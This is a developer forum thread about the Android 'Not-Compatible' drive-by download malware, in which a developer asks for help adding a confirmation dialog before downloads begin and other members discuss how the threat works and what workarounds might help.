[Devs] Not-Compatible - Driveby Downloads

[JerryScript]

I mentioned this several months ago, both here and at XDA, but got little to no feedback. Now I feel action must be taken!

For those who aren't aware of it, there is a major flaw in Android involving downloads. Unlike on your computer that asks you if you want to download something before it starts the download, Android will simply begin a download in the background without any user approval.

Now there are people taking advantage of this vulnerability using what's called the Not-Compatible drive-by download. You visit an infected webpage with your Android phone, and it starts a download and installs software without your knowledge or approval. This can take over your phone entirely, causing it to send SMS to premium numbers resulting in charges, or stealing your personal info and even passwords, or even initiating a call to a premium phone number resulting in charges.

I asked for anyone interested in helping develop a safeguard in the past to post or PM me. I am now asking again. I would like to have an interstitial dialog added anytime a download is started, allowing the user to decide if it should proceed. This is the standard in the computer industry on almost every OS, and IMHO it should be standard on Android.

I will be working on this for the next couple of weeks, attempting to find the most unobtrusive means to ensure user safety without hindering the user experience. If you are interested in helping fix this huge security hole in Android, please let me know!

 

[tvall]

Finally a skilled dev decides to tackle this issue! Good luck Jerry!
(I'd offer to help, but I'm not skilled at that kind of thing)

 

[cole2kb]

Interested? Hell yes. Would I be of any actual use, with no knowledge of application development whatsoever? Probably not, lol. I've got skills in Photoshop for icons / interface graphics / logos but that's about the best I can do, unless you can think of something else / more useful for me to do.

 

[drewwalton19216801]

I mentioned this several months ago, both here and at XDA, but got little to no feedback. Now I feel action must be taken!

For those who aren't aware of it, there is a major flaw in Android involving downloads. Unlike on your computer that asks you if you want to download something before it starts the download, Android will simply begin a download in the background without any user approval.

Now there are people taking advantage of this vulnerability using what's called the Not-Compatible drive-by download. You visit an infected webpage with your Android phone, and it starts a download and installs software without your knowledge or approval. This can take over your phone entirely, causing it to send SMS to premium numbers resulting in charges, or stealing your personal info and even passwords, or even initiating a call to a premium phone number resulting in charges.

I asked for anyone interested in helping develop a safeguard in the past to post or PM me. I am now asking again. I would like to have an interstitial dialog added anytime a download is started, allowing the user to decide if it should proceed. This is the standard in the computer industry on almost every OS, and IMHO it should be standard on Android.

I will be working on this for the next couple of weeks, attempting to find the most unobtrusive means to ensure user safety without hindering the user experience. If you are interested in helping fix this huge security hole in Android, please let me know!

How exactly does this exploit work, in terms of silently installing software? I know you can install an apk silently by using the pm utility, but how does that work from a website?

I'm game for helping to develop this safeguard. In theory it should be pretty simple, except that it won't be applicable to third-party web browsers that have their own download mechanism.

 

[sellers86]

How exactly does this exploit work, in terms of silently installing software? I know you can install an apk silently by using the pm utility, but how does that work from a website?

I'm game for helping to develop this safeguard. In theory it should be pretty simple, except that it won't be applicable to third-party web browsers that have their own download mechanism.

If it has a seperate download mechanism, then it wouldn't matter because the mechanism asks (I.e opera mini dialogue box). This, in most cases, only pertains to the stock browser. I'd love to help, but iI wouldn't have the first clue on what to do

Sent from my LG-VM670 using Tapatalk

 

[JerryScript]

How exactly does this exploit work, in terms of silently installing software? I know you can install an apk silently by using the pm utility, but how does that work from a website?

I'm game for helping to develop this safeguard. In theory it should be pretty simple, except that it won't be applicable to third-party web browsers that have their own download mechanism.

From what I've read and put together from a lot of different sources/reports, the current exploit initiates the download, then the users has to agree to install an app with a name/description that makes it seem official (anroid.com.Security, Update.apk, etc). However, on rooted devices the exploit can bypass that, as you've noted with the pm function. I have not seen examples of code being used, but I'm more concerned with the fact we don't even get security updates on Android ATM, and this exploit will undoubtedly be evolving, so we need to attack it as deep in the system as we can.

I'm pretty sure all downloads are handled by Android at some point deep enough, regardless of the app initiating them, or the apps method. That's the first step in resolving this, digging through the download code. I'm beginning by grepping for relavent terms, and studying the docs. If we can insert an interstitial dialog allowing the user to download/cancel at a point in the code deep enough to handle all download options, this will be a breeze. If it turns out there are a bunch of different download mechanisms, then we should probably look for a different method.

Here's a preliminary grep of "download" I did at the end of last year. I'm going to run a pretty comprehensive grep overnite, I'll pastebin the results tomorrow.
http://pastebin.com/bGzV7iKt

BTW- I posted about this vulnerability at the end of the year at XDA, got zero responses, meh.

 

[EarthnFire78]

from what I understand about the downloaders the coding is very simple, and works be exploiting the openness of Java.

A friend that works for the FBI Cyber Division explained to me that 90% of all the viruses look for a way to exploit Java, which is really easy to do.

 

[LeslieAnn]

I really hate Java and Flash...
Then again, I shouldn't complain too much, job security and all...

 

[EarthnFire78]

I really hate Java and Flash...
Then again, I shouldn't complain too much, job security and all...

Flash is worse when to comes to exploitable, Which is one reason I stay away from web pages that are almost completely flash. For some reason my ISP uses a flash web page o.0

Even though flash is easier to exploit, then Java it is not used as much as Java is.

 

[curtis1973]

temp quick fix : delete stock browser and downloads. i use other browsers anyway for downloading and have these two items deleted as system apps. or if Jerry doesn't think thats a safe temp alternative,just dont use the stock browser at all. ive never experienced downloads starting using other browsers except stock. maybe miren browser could be used as stock. its not updated on market anymore,still works great. maybe the chinese developer wouldn't mind allowing its use as open source (looks like they stole most of it from other browsers anyway lol)

edit : nevermind,didn't realize this was not an app issue but more of a droid os issue. but still...miren as open source would be nice.

 

[Eollie]

The best way to stop this is to uncheck unknown sources in applications. This will not allow them to install.

Another thing is to educate the masses.

Jerry what your talking about doing is built into android. Its the function above. The thing is the masses of people not aware of these kinds of things happening.What needs to happen is a reminder that you have it checked each time you reboot or maybe on a timer after you check the option.

 

[JerryScript]

Unfortunately, it's not as simple as not using a particular browser, or disallowing unknown sources. Those are quick fixes that may work for now, but do not cover all bases. For example, the DownloadManager is not even part of the browser, it's in frameworks/base, and can be called from anything with the appropriate permissions. And this exploit was only accidentally published last week, so it will undoubtedly mature.

It may be too much to cover every possibility, after all a stream can always be buffered to a file, but we can at least cover the standard Android implementations, which is what most exploits would target.

 

[nodamnspam]

Thanks for looking into this Jerry and thanks for all your hard work, both you and other Devs like LeslieAnn (running Harmonia 2.06 on my OV... so is my wife). I wish I could do more for the community, but I'm more of a phone geek than anything else. Development is beyond me.